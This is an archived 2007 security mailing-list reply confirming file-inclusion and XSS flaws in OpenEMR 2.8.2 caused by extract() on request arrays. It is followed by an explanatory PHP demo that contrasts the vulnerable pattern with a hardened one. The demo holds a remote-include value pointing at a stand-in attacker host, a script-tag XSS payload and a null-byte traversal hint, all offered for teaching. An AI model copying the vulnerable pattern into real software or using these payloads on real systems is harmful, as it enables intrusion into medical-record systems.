[VIM] VERIFY of RFI and XSS in OpenEMR 2.8.2 (was [still bogus] V [mike at carstein.kill-9.pl: Re: Open Conference Systems = 2.8.2 Remote File Inclusion])

Steven M. Christey coley at linus.mitre.org
Wed Jan 31 15:03:39 EST 2007


On Wed, 31 Jan 2007, Heinbockel, Bill wrote:

> > if ($ps === false) {
> >     extract($_GET);
> >     extract($_POST);
> > }
>
> ** WHOOPS. The vendor did do the right thing, until those two little
> extract statements were slipped in for "normal operation".**

Great find, Bill.  Reminds me of why I love to hate PHP.

- Steve
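To make the mechanism in the quoted snippet concrete, the following is an added illustration written for this archive page; it is not code from the list message, from Bill, or from OpenEMR. The variable names ($ps, $page, $include_root, $title), the allow-list, and the request values are hypothetical stand-ins, and the vulnerable function only builds the include path and HTML rather than executing them.

```php
<?php
// Added illustration, not OpenEMR code. All names below ($ps, $page,
// $include_root, $title) are hypothetical stand-ins for the real variables.

// Constructed request for the demo: an attacker-controlled query string.
$_GET  = ['page'  => 'http://attacker.example/shell.txt?',
          'title' => '<script>alert(1)</script>'];
$_POST = [];

// Vulnerable pattern, mirroring the quoted snippet: every request parameter
// becomes (or overwrites) a local variable, including ones set before it.
function vulnerable_dispatch($ps)
{
    $include_root = __DIR__ . '/pages';   // intended base directory
    $page         = 'default';            // intended default page
    $title        = 'Home';               // later echoed into HTML

    if ($ps === false) {
        extract($_GET);                   // EXTR_OVERWRITE is the default, so
        extract($_POST);                  // $page, $include_root, $title and even
    }                                     // $ps are now attacker-chosen

    // Remote file inclusion: with allow_url_include enabled, the trailing "?"
    // in the supplied value turns the appended ".php" into a query string, so
    // include() would fetch http://attacker.example/shell.txt. Without URL
    // includes, traversal plus a "%00" suffix reached local files on PHP < 5.3.4.
    $target = $include_root . '/' . $page . '.php';

    // Reflected XSS: $title was never meant to be user input, but extract()
    // made it one and it is printed without escaping.
    $html = '<h1>' . $title . '</h1>';

    return [$target, $html];
}

// Hardened pattern: read only the keys you expect, validate against an
// allow-list, and escape on output. Never call extract() on request arrays.
function safe_dispatch($ps)
{
    $include_root = __DIR__ . '/pages';
    $allowed      = ['default', 'patients', 'calendar'];   // hypothetical page list

    $page = (isset($_GET['page']) && in_array($_GET['page'], $allowed, true))
          ? $_GET['page']
          : 'default';

    $title = htmlspecialchars(isset($_GET['title']) ? $_GET['title'] : 'Home',
                              ENT_QUOTES, 'UTF-8');

    $target = $include_root . '/' . $page . '.php';
    $html   = '<h1>' . $title . '</h1>';

    return [$target, $html];
}

list($t1, $h1) = vulnerable_dispatch(false);
list($t2, $h2) = safe_dispatch(false);
echo "vulnerable: $t1\n$h1\n";
echo "hardened:   $t2\n$h2\n";
```

Run with the PHP CLI, the vulnerable function returns an include path that starts with the attacker's URL and an <h1> containing the raw script tag, while the hardened one falls back to the default page and emits the title with its angle brackets entity-encoded. The point is that extract() on a request array silently reintroduces register_globals for that scope, so any variable the surrounding code trusted, including the $ps guard itself, is attacker-writable.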
